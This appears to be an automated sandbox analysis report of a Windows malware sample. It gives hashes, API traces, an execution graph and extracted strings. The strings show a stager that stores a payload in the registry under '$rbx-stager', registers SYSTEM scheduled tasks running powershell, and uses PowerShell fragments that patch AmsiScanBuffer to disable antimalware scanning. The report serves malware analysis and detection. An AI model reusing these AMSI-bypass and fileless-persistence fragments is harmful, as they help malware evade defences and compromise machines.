                                                  • Instruction ID: e883bdd8a5e3e52a1983a9689339df62c2d5d695a13d1024315a180defb669ea
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: A561C136609BC889EB309F15E4497DAB7A0F785B98F048215EF9847B99DF78C191CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 7105e8a5152630e359f37512163824fc5bb7923ccc734ab9b5f8a72ef0f0a05d
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 5C51146E30A78191EA34DE3AB45C3AB6B91F385B90F448025DE9943B8DDE3BD805C742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 3e7e8d6d1a6e632f5065a09dca104f8f9b5929b1dce5b56eb93c535d01b326a8
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 4341F777726A8086E720DF25E44C79AB7A0F398794F958121FE8D87758EF38D442CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 7dad71fc742a30e8d325a8eae6b13976bd306b0cca2ac64f61d0170ef9adfcc1
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: B7113D36219B8086EB218F15F448259B7E5F788B98F598220EE8D07B64DF3CC591CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: e70868f934c29b2d570513af42d0034e86a83edcec284c3cdd38933af4473216
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 9111CC29B06B8081EA25CF6AE80D25977B0FB89FE4F5C8168DE4E53724EF39C442C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: bb30f2951b71e212274d86ff890bb7038d8d7fd274c2cc55501875b92101e49f
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 7EE092357026049AF7258F62D80D75936E1FB8CF19F44C0A4C90A07350EF7D84DAC761
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 9b2ee867c04a6b8f8a7d8f2dbe3722ef5b2080ab8181f99cc844714b83ec0013
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 74E012757125049BF7299F62DC0D75976E1FB8CF19F44C0A4C90A07310EE3C849AD721
                                                  Memory Dump Source
                                                  • Source File: 00000024.00000002.2042219280.00000000032AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_36_2_32ad000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e9568e253ad0bf1c38820154006eda439376f6519026855321efca018931566
                                                  • Instruction ID: 7e4d80896dae02f136ef29d9ab9ecbc2e243f816a3ebd7e2f0b7991a285f5288
                                                  • Opcode Fuzzy Hash: 5e9568e253ad0bf1c38820154006eda439376f6519026855321efca018931566
                                                  • Instruction Fuzzy Hash: E3016D6244D7C09FD7128B258CA4752BFA8EF43320F0984CBE9848F593C2685845C772
                                                  Memory Dump Source
                                                  • Source File: 00000024.00000002.2042219280.00000000032AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_36_2_32ad000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87270502b2a84febe43c3cfe75b0883bea217f5ad3b865af392729a1cc765049
                                                  • Instruction ID: d3eda72d1f6189c81bb35d15d3147e92b6c9e22647644d4b39ef40c6181730ee
                                                  • Opcode Fuzzy Hash: 87270502b2a84febe43c3cfe75b0883bea217f5ad3b865af392729a1cc765049
                                                  • Instruction Fuzzy Hash: B701F731514B40AFE7208A29CC94B67FB98EF41760F088059ED480F682C2B99485DAB2

                                                  Execution Graph

                                                  Execution Coverage:74.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:25.7%
                                                  Total number of Nodes:101
                                                  Total number of Limit Nodes:9
                                                  execution_graph 238 401798 241 4017a5 FindResourceA 238->241 242 40179d ExitProcess 241->242 243 4017c5 SizeofResource 241->243 243->242 244 4017d8 LoadResource 243->244 244->242 245 4017e4 LockResource RegOpenKeyExW 244->245 245->242 246 40180b RegSetValueExW 245->246 246->242 247 401822 246->247 259 401868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 401835 252 401674 9 API calls 251->252 253 401841 252->253 306 40112f GetCurrentProcess IsWow64Process 253->306 257 401854 257->242 319 40151a SysAllocString SysAllocString CoInitializeEx 257->319 329 401159 259->329 261 401893 262 4018c5 StrCatW StrCatW 261->262 263 40189d StrCatW 261->263 332 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 262->332 264 40112f 2 API calls 263->264 266 4018aa StrCatW StrCatW 264->266 266->262 271 401986 6 API calls 272 4018f0 271->272 273 401986 6 API calls 272->273 274 4018fc 273->274 275 401986 6 API calls 274->275 276 401908 275->276 277 401986 6 API calls 276->277 278 401914 277->278 279 401986 6 API calls 278->279 280 401920 279->280 281 401986 6 API calls 280->281 282 40192c 281->282 283 401986 6 API calls 282->283 284 401938 283->284 285 401986 6 API calls 284->285 286 401944 285->286 287 401986 6 API calls 286->287 288 401950 287->288 289 401986 6 API calls 288->289 290 40195c 289->290 291 401986 6 API calls 290->291 292 401968 291->292 293 401986 6 API calls 292->293 294 401974 293->294 295 401986 6 API calls 294->295 296 401827 295->296 297 401674 SysAllocString SysAllocString CoInitializeEx 296->297 298 401782 297->298 299 4016a7 CoInitializeSecurity 297->299 302 401785 SysFreeString SysFreeString 298->302 300 4016c8 CoCreateInstance 299->300 301 4016bd 299->301 303 4016ea VariantInit 300->303 305 40172d CoUninitialize 300->305 301->300 301->305 302->251 303->305 305->302 307 40114e 306->307 308 4011ad 7 API calls 307->308 309 4014f0 308->309 310 401209 CoInitializeSecurity 308->310 311 4014f3 6 API calls 309->311 312 40122a CoCreateInstance 310->312 313 40121f 310->313 311->257 314 401444 CoUninitialize 312->314 315 40124c VariantInit 312->315 313->312 313->314 314->311 317 40128f 315->317 317->314 318 4013dd VariantInit VariantInit VariantInit 317->318 318->314 320 40154d CoInitializeSecurity 319->320 321 40165f SysFreeString SysFreeString 319->321 322 401563 320->322 323 40156e CoCreateInstance 320->323 321->242 322->323 324 401659 CoUninitialize 322->324 323->324 325 401590 VariantInit 323->325 324->321 326 4015d3 325->326 327 401605 VariantInit 326->327 328 40162b 326->328 327->328 328->324 352 40118e GetModuleHandleA 329->352 331 401178 331->261 355 401000 CryptAcquireContextW 332->355 335 401a37 StrStrIW 337 401a9d 335->337 336 4018d8 345 401986 lstrlenW 336->345 338 401b71 6 API calls 337->338 339 401a57 StrStrIW StrNCatW StrCatW 337->339 341 401b27 StrCatW 337->341 342 401afb StrCatW StrNCatW 337->342 344 401adf StrCatW StrCatW 337->344 338->336 339->337 340 401b41 StrCatW StrStrIW 339->340 340->337 341->337 341->340 343 401b18 StrCatW 342->343 343->341 344->343 358 40104b 345->358 348 4019b3 StrStrIW 349 4018e4 348->349 350 4019bf 348->350 349->271 351 4019c0 StrStrIW 350->351 351->349 351->351 353 4011aa 352->353 354 40119d GetProcAddress 352->354 353->331 354->331 356 401044 355->356 357 401028 CryptGenRandom CryptReleaseContext 355->357 356->335 356->336 357->356 359 401000 3 API calls 358->359 360 401076 359->360 360->348 360->349

                                                  Callgraph

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 122 401456 118->122 123 4013b9-4013c7 118->123 119->114 124 401459-401462 122->124 123->122 126 4013cd-4013db 123->126 124->119 126->122 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                                                  APIs
                                                  • SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                                  • SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                                  • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                  • SysAllocString.OLEAUT32(?), ref: 004011E0
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                  • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                  • VariantInit.OLEAUT32(?), ref: 00401250
                                                  • VariantInit.OLEAUT32(?), ref: 004013EA
                                                  • VariantInit.OLEAUT32(?), ref: 004013F0
                                                  • VariantInit.OLEAUT32(?), ref: 00401400
                                                  • CoUninitialize.COMBASE ref: 004014E8
                                                  • SysFreeString.OLEAUT32(?), ref: 004014FA
                                                  • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                                                  • SysFreeString.OLEAUT32(?), ref: 00401502
                                                  • SysFreeString.OLEAUT32(?), ref: 00401507
                                                  • SysFreeString.OLEAUT32(?), ref: 0040150C
                                                  • SysFreeString.OLEAUT32(?), ref: 00401511
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                  • String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
                                                  • API String ID: 3960698109-3701805373
                                                  • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                                  • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
                                                  • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                                  • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 LoadResource 154->156 155->153 156->155 157 4017e4-401809 LockResource RegOpenKeyExW 156->157 157->155 158 40180b-401820 RegSetValueExW 157->158 158->155 159 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 158->159 159->155 170 40185a-40185c call 40151a 159->170 170->155
                                                  APIs
                                                  • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                  • RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                    • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                    • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                    • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                    • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                                    • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                    • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                    • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                                                    • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
                                                    • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
                                                    • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                    • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                    • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                    • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                    • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                    • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                    • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                    • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                    • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                  • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
                                                  • API String ID: 2402434814-2001424239
                                                  • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                  • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                                                  • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                  • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 190 401000-401026 CryptAcquireContextW 191 401044-40104a 190->191 192 401028-401041 CryptGenRandom CryptReleaseContext 190->192 192->191
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                  • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                  • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                  Strings
                                                  • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                  • API String ID: 1815803762-291530887
                                                  • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                  • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                                                  • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                  • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                  • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                                  • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                  • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                                  • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                                  Strings
                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                                                  • LoadLibraryDelegate, xrefs: 00401920
                                                  • GetProcAddress, xrefs: 00401914
                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                                                  • AmsiPtr, xrefs: 0040195C
                                                  • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                                                  • VirtualProtectPtr, xrefs: 00401950
                                                  • AmsiScanBufferPtr, xrefs: 00401968
                                                  • OldProtect, xrefs: 00401974
                                                  • Get-Delegate, xrefs: 004018D8
                                                  • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
                                                  • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                                                  • LoadLibraryPtr, xrefs: 00401944
                                                  • ParameterTypes, xrefs: 004018E4
                                                  • NativeMethods, xrefs: 00401908
                                                  • VirtualProtectDelegate, xrefs: 0040192C
                                                  • ReturnType, xrefs: 004018F0
                                                  • TypeBuilder, xrefs: 004018FC
                                                  • Kernel32Ptr, xrefs: 00401938
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
